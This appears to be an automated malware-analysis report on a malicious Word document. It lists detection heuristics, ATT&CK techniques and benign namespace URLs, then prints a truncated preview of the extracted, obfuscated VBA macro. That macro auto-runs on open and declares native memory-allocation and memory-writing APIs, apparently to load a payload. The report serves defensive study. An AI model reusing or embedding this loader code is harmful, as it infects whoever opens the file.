MALICIOUS
Risk Score: 122
Malware Insights
MITRE ATT&CK
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
The critical ClamAV heuristic and the high-severity OLE_VBA_DOCOPEN finding indicate the presence of malicious VBA macros. The Document_Open macro is designed to execute code as soon as the document is opened, most likely to download and execute a secondary payload. The extracted URLs are benign (they are XML/XMP namespace identifiers from the document body, not macro-reached addresses), but the macro's structure and the presence of API declarations point to downloader or dropper functionality. The family is unknown because no family-specific indicators were found.
Heuristics 4
- ClamAV: Doc.Downloader.Macro-6539595-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Downloader.Macro-6539595-0
- VBA macros detected (medium, OLE_VBA_MACROS, 1 related finding): Document contains VBA macro code
- Document_Open macro (high, OLE_VBA_DOCOPEN): Document_Open macro
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - http://ns.adobe.com/xap/1.0/ (in document text, OLE body)
  - http://www.w3.org/1999/02/22-rdf-syntax-ns# (in document text, OLE body)
  - http://ns.adobe.com/photoshop/1.0/ (in document text, OLE body)
  - http://purl.org/dc/elements/1.1/ (in document text, OLE body)
  - http://ns.adobe.com/xap/1.0/mm/ (in document text, OLE body)
  - http://ns.adobe.com/xap/1.0/sType/ResourceEvent# (in document text, OLE body)
  - http://ns.adobe.com/xap/1.0/sType/ResourceRef# (in document text, OLE body)
  - http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 34284 bytes |

SHA-256: 2bf1d010a0c42eda175c0eed0a52eba5dd59f54e22bd487329864cddb6aaa42c

Preview script (first 1,000 lines of the extracted script):

```vb
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
Dim acidotic As Byte
Dim highboy As Long
dealer = debilitation
littlew.ascent
megawatt = 28 + 1
Pmt 0, megawatt, 29717, 18842, 5
End Sub
Attribute VB_Name = "titanium"
#If (73 - 12 + 339 + 12 - 126 + 414) > ((12 - 105 + 413) - (40 - 85 + 585) * 1) And Not ((56 - 91 + 63) - (33 - 74 + 69)) * 2 < (Win64) Then
Public Declare Function anthus _
Lib "Ntdll " Alias _
"NtAllocateVirtualMemory" (natantia As Long, custum As Long, ByVal tangent As Long, asterByVal As Long, amicus As Long, ByVal adornment As Long) As Long
Public Declare Function adoration _
Lib "ntdll " Alias _
"AcquireSRWLockShared" (outstep As Any) As Long
Public Declare Function bureau _
Lib "Shlwapi " Alias _
"SleepConditionVariableSRW" (ByVal asin As Any, dicynodontia As Any, coequal As Any, civilisan As Any) As Long
Public Declare Function bouleversement _
Lib "Kernel32 " Alias _
"CreateEventW" (ByVal mayeng As Long, cephalanthera As Long, pisciculture As Long, synthetic As Long, scapegoat As Long) As Long
Public Declare Function cephaloridine _
Lib "Ntdll " Alias _
"NtWriteVirtualMemory" (ByVal barbarus As Any, ByVal dragon As Any, ByVal celebrate As Any, ByVal equation As Any, ByVal artfully As Any) As Long
Public Declare Function crankcase _
Lib "Kernel32" Alias _
"CreateTimerQueueTimer" (crookedness As Any, ByVal coetanian As Any, ByVal addictive As Any, ByVal rarely As Any, ByVal bonito As Any, ByVal motorist As Any, ByVal impracticable As Any) As Long
Public Declare Function sortance _
Lib "Shlwapi " Alias _
"GetOverlappedResult" (ByVal acyclic As Any, bonded As Any, contemptuously As Any, stealthy As Any) As Long
#End If
Function ruck()
Dim brasserie(255) As Byte
chlorophyceae = 15 - 127 + 177
Do While chlorophyceae <= 90 + 1
brasserie(chlorophyceae) = chlorophyceae - 65
chlorophyceae = chlorophyceae + 1
Loop
chlorophyceae = 48
Do While chlorophyceae <= 50 + 8
brasserie(chlorophyceae) = chlorophyceae + 4
chlorophyceae = chlorophyceae + 1
Loop
chlorophyceae = 97
Do While chlorophyceae <= 120 + 3
brasserie(chlorophyceae) = chlorophyceae - 71
chlorophyceae = chlorophyceae + 1
Loop
brasserie(47) = 63
chlorophyceae = 43
brasserie(chlorophyceae) = 60 + 2
ruck = brasserie
End Function
Function autopsy(poke, dispossession, conduce)
#If (41 - 19 + 378 + 86 - 61 + 275) > ((55 - 39 + 304) - (40 - 75 + 575) * 1) And ((86 - 15 - 43) - (100 - 121 + 49)) * 2 < (Win64) Then
Dim fellah As LongPtr
Dim adrenal As LongPtr
Dim percolation As LongPtr
Dim beam As LongPtr
Dim bb As LongPtr
#ElseIf (34 - 6 + 372 + 57 - 11 + 254) > ((26 - 91 + 385) - (40 - 119 + 619) * 1) And Not ((118 - 126 + 36) - (3 - 22 + 47)) * 2 < (Win64) Then
Dim adrenal As Long
Dim calosoma As Byte
Dim fellah As Long
Dim exposed As Integer
Dim beam As Long
Dim resourceful As Byte
Dim percolation As Long
Dim alacritous As String
Dim bb As Long
Dim anapsida As Variant
Dim phenylalanine As Variant
#End If
adrenal = poke
bb = conduce
beam = dispossession
bluehead = 37 + 7
Pmt 0, bluehead, 26699, 43579, 8
fellah = 83 - 122 + 38
cephaloridine ByVal fellah, _
adrenal, beam, _
bb, percolation
End Function
Attribute VB_Name = "tenuere"
Function candlemas(chamaemelum, participial, legally)
Select Case legally
Case 32 + (10 / 2 - 5)
candlemas = chamaemelum \ participial
Case 42 + (5 - 3) / 2 - 1
candlemas = chamaemelum And participial
Case 50 + (56 / 7 - 4 * 2)
candlemas = chamaemelum * participial
End Select
End Function
Function excitabat(idol) As String
Dim motivated As Long
Dim pyrotechny As Long
Dim defensively(6962) As Byte
Dim insider As Long
Dim aniseikonia(63) As Long
Dim beefwood(63) As Long
Dim infelicitous() As Byte
Dim helical(63) As Long
Dim bruiser As Long
... (truncated)
```